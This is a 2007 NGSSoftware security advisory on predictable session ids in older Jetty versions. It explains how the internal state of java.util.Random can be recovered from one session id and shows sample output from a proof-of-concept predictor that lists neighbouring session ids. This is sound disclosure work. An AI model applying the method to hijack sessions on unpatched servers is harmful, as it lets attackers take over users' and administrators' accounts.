======= Summary ======= Name: Jetty Session Id Prediction Release Date: 5 February 2007 Reference: NGS00471 Discover: Chris Anley Vendor: Mortbay Systems Affected: Jetty prior to versions 4.2.27, 5.1.12, 6.0.2 and 6.1.0pre3 Risk: High Status: Fixed ======== TimeLine ======== Discovered: 17 November 2006 Reported: 22 November 2006 Fixed: 25 November 2006 Published: 5 February 2007 =========== Description =========== Versions of Jetty, the popular java web server, are vulnerable to a session id prediction attack. Jetty uses java.util.Random to generate session ids. The internal state of this generator can be easily discovered, leading to an attacker being able to hijack existing and future sessions. ================= Technical Details ================= java.util.random implements a linear congruential generator, of the following form: synchronized protected int next(int bits) { seed = (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1); return (int)(seed >>> (48 - bits)); } Jetty generates a 64-bit session id by generating two 32-bit numbers in this way, so we end up with an encoded 64-bit integer. By decoding the integer and splitting it into its two component 32-bit integers, we can easily brute-force the generator's internal state. Once the state is discovered, the generator can be run both forwards and backwards, so an attacker can determine previously generated session ids, as well as session ids that have not yet been generated. This allows the attacker to hijack any existing session, and perform any actions that the original user of the session could perform. Obviously the severity of this issue varies from application to application but we believe it warrants at least a "high" risk rating. NGS have developed proof of concept code for this issue that implements a session predictor for this bug. It takes a session id as input and outputs candidates for the next 5 and previous 5 session ids. It is necessary to output 7 candidate session ids for each iteration because Jetty encodes the session id in a number base from 30 to 36 depending on the millisecond in which the session id was generated. The underlying 64-bit integer is the same, just represented in bases 30-36. Here is some example output: H:\jetty_rand\Debug>jetty_rand.exe g4sse9e7fs5ee Radix: 30 Found seed: 5346772124980067 Session -5: 27s4jsk03074k 1gbb661e0l6mp 11ctqbu24shqo nqqa46cv6ovh h4xlr7d8n98c cg9x29g6vfna 9568uhp0c7yw Session -4: 586o97hbtkkis 3h9o0c9eglm5q 2dpgen12bekgo 1mf3ar81r4e7d 15vq2mdv83nmo t13aedmjm4ts lamwq2jurlzs Session -3: c2kqln033ior 8d98tft18mgj 5u715san1m0b 47rifnwhompl 31pb1t2496ef 27mbqm91n0gc 1mksf8xjn6kr Session -2: h5n7ft13ak1nr biif83e4tlq37 7tj3f6tclak5h 5fpk27ulvu2nu 3s5vpubx7ekc9 2om684eem9iy2 1xf0lar1nqpwx Session -1: 66isdajhm658g 463l7trqe65oo 2rodl8h2bjkb4 1wdl0j3wqr6tj 1d3hc9k0gm9ja y8hj85q65rxq p49erbpgioo4 Session 0: g4sse9e7fs5ee as3iaiqcjo82g 7eeb56egthkrm 54w87w5wtpwfk 3kdimj6vemoce 2iybbcyacjqk9 1t9qijf82uk52 The issue affects a great many products that are based on Jetty, such as Apache Geronimo: http://geronimo.apache.org/ The latest version (2.0) of Geronimo is not vulnerable to this issue. Version 1.1 and prior are vulnerable however, and this issue can be used to hijack a session to the administrative console. A further 98 projects based on Jetty are listed on the Jetty website at: http://www.mortbay.com/powered.html =============== Fix Information =============== This issue was fixed in the source code on the 22nd of November 2006, less than 6 hours after it was reported. The issue is fixed in released versions 4.2.27, 5.1.12, 6.0.2 and 6.1.0pre3. The changes can be viewed here: http://fisheye.codehaus.org/changelog/jetty/?cs=1274 NGSSoftware Insight Security Research http://www.ngssoftware.com/ http://www.databasesecurity.com/ http://www.nextgenss.com/ +44(0)208 401 0070 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402